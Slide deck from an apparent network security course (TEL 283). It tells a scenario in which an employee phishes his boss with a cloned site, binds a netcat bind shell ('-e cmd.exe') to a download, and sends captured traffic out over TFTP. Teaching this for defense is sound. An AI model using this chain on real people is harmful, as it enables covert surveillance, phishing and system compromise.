210 likes | 412 Views
TEL 283. What’s the Boss viewing?. Policy. The Boss established a new policy against surfing the web during work hours Phoenix decides to examine the sites that the Boss is looking at by spying on him. Setup. The networked machines are connected via a switch Private 192.168.1.0 network
E N D
TEL 283 What’s the Boss viewing?
Policy • The Boss established a new policy against surfing the web during work hours • Phoenix decides to examine the sites that the Boss is looking at by spying on him
Setup • The networked machines are connected via a switch • Private 192.168.1.0 network • Boss’ IP: 192.168.1.5 • Phoenix’s IP: 192.168.1.6
The Plan • Monitor traffic to and from the Boss’ machine • How “loud” should this approach be? • Loud/noisy means that could trigger alarms of IDS/IPS systems • Might be reasons to launch a noisy attack • Provide a distraction to another attack • Sometimes it’s the only way to monitor traffic • Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done
Viewing Switched Network Traffic • “Loud” methods • Gratuitous ARP for individual hosts • ARP Poisoning • MAC spoofing • MAC flooding • SPAN • Port mirroring
Viewing Switched Network Traffic • Gratuitous ARP • Unsolicited ARP • Protocol allows for it, without checking for the ARP request (stateless!) • ARP reply sent out associating the target’s IP with the collector’s MAC address • Spoof the MAC of the gateway • Collector replies to ARP requests for the gateway’s MAC • Switch will see the router’s MAC address on both switch ports will send outbound traffic to both ports • MAC flooding • Overwhelm the switch’s MAC table • Causes the switch to “failover” into hub mode • MACOF (http://monkey.org/~dugsong/dsniff/)
Quieter method • Capture the traffic on the target host itself • Plant WinPCap and Trojan Horse on the host • The trick will be to install the software on the target host • Boss will not blindly install software • Have to convince him it’s something of value to him • The plan consists of a chained series of exploits
The Plan • Copy a web site and host it on Phoenix’s server • Bind Netcat to a legitimate executable file • Send email to boss • Download the free executable • Netcat will also be downloaded and installed • Connect to boss’ machine using Netcat • Use TFTP and download a WinDump program onto boss’ machine • Capture the boss’ network traffic • Analyze captured traffic • Rebuild a jpg image using a hex editor
Phishing Scam • Phoenix locates a site and plans to get his boss to visit a copied version of the site • Lays the groundwork via some social engineering • Tells boss of a site “certificatepractice.com” which offers free CCNA practice exam as a promotional offer • Uses a utility to download and mirror the site • Wget (www.gnu.org/software/wget) • Copy the site recursively to hard drive, with appropriate level of hyperlinks of the 1st page • Will also copy the practice test executable • Phoenix will bind his Trojan to this executable
Binding the Trojan • Trojan wrapper program is used • YAB (Yet Another Binder) • Areyoufearless.com (no longer there, however can get via BitTorrent sites) • Altavista.net • Packetstormsecurity.org • Add Bind File option • Allows Phoenix to bind nc.exe • Will execute nc (asynchronously is possible) • Can add execution parameters when nc starts up • Np 50 –e cmd.exe –L • Registry startup option available (default is no) • Melt stub option • Will remove netcat after execution • Icon can be added to make the install appear legitimate
Setting up the phishing site • Overwrite the original ccna.exe file with the bound Trojan file in the phony site • Register a very similar domain name • “certification-practice.com” • Send an email to victim • Phoenix uses an anonymous e-mailer and spoofs the email header to have the “From:” appear as the real site • www.mail.com • Doesn’t require a “real” email address to register • Victim would have to read the email message headers in order to see the real source domain
Email • Check for spelling and grammatical errors • Offer something free or trial basis • Appeal to greed • Why victim is getting something for nothing • Lower suspicion • Appeal to victim’s sense of self • Self-help tools, adding to success, etc • Brevity • Text of the email contains the link to the site • Appears as the URL of the real site, but the hyperlink is really the phony site • Present the email to the victim • Possibly prepare the victim for the email, adding to the enticement
Obtain the Vic’s IP address • Angry IP Scanner • www.angryziber.com/ipscan/ • Scan IP’s on the network for the IP with port 50 open and listening
Connect to the victim machine • nc to the victim’s machine on port 50 • Verify the connection using ipconfig • Will show the victim machine’s IP in the nc window
Install packet capture software • Use command line utility • nc does not allow for usage of a GUI (Windows) interface • Sysinternals has a TFTP server available • Free • No configuration required • Windows already has a TFTP client! • Windump is downloaded • www.winpcap.org/windump • Placed into the default TFTP server directory (TFPT-Root) • Phoenix sets up a TFTP server on his machine • Using Netcat, Phoenix types tftp –i 192.168.1.6 get windump.exe windump.exe tftp [-i] host [put | get] source destination -i switch use binary transfer
Run Windump • Options • -c count (packets) • -s snaplength (length of packets captured) • -w filename (of captured packets) windump –c 500 –s 1500 –w capture.log • If the victim does not have winpcap installed, Phoenix must transfer and manually install winpcap on victim machine • Windump requires winpcap
Installing winpcap • Phoenix downloads winpcap • Unzips it • TFTP (to victim’s winpcap directory) • Daemon_mgm.exe • NetMonInstaller.exe • Npf_mgm.exe • Rpcapd.exe • Uninstall exe • Execute Npf_mgm.exe –r Daemon_mgm.exe –r NetMonInstaller.exe i
Analyzing the capture log • Using Netcat tftp –I put 192.168.1.6 capture.log • Use a packet analyzer to view the traffic • Wireshark • A review show sites visited by the victim • Includes a GET (HTTP) for a file called “gambling.jpg” • Follow TCP stream • Capture the output as raw data • Use a hex editor (WinHex), if required, to edit the raw data • Remove everything before the actual binary file (HTTP commands, etc) • Leaves just the actual binary of the image • Jpg starts with ÿØÿà
Finale • Anonymous note left on the victim’s desk highlighting the activity • Internet usage policy relaxed the next day
Countermeasures • Phishing • Training! • Spam filters / phishing filters • Trojan horse • Anti-virus software • Latest signatures • However • Organizations will alter the Trojan (for a price) so that it does not match a signature • EliteC0ders (no longer offers this “service”) • Software policy • Sniffing • Port security on switches • Protects against ARP poisoning, MAC spoofing and MAC flooding • IPS • PromiScan • Host based IDS • Cisco Secure Agent • Warns if new application is launching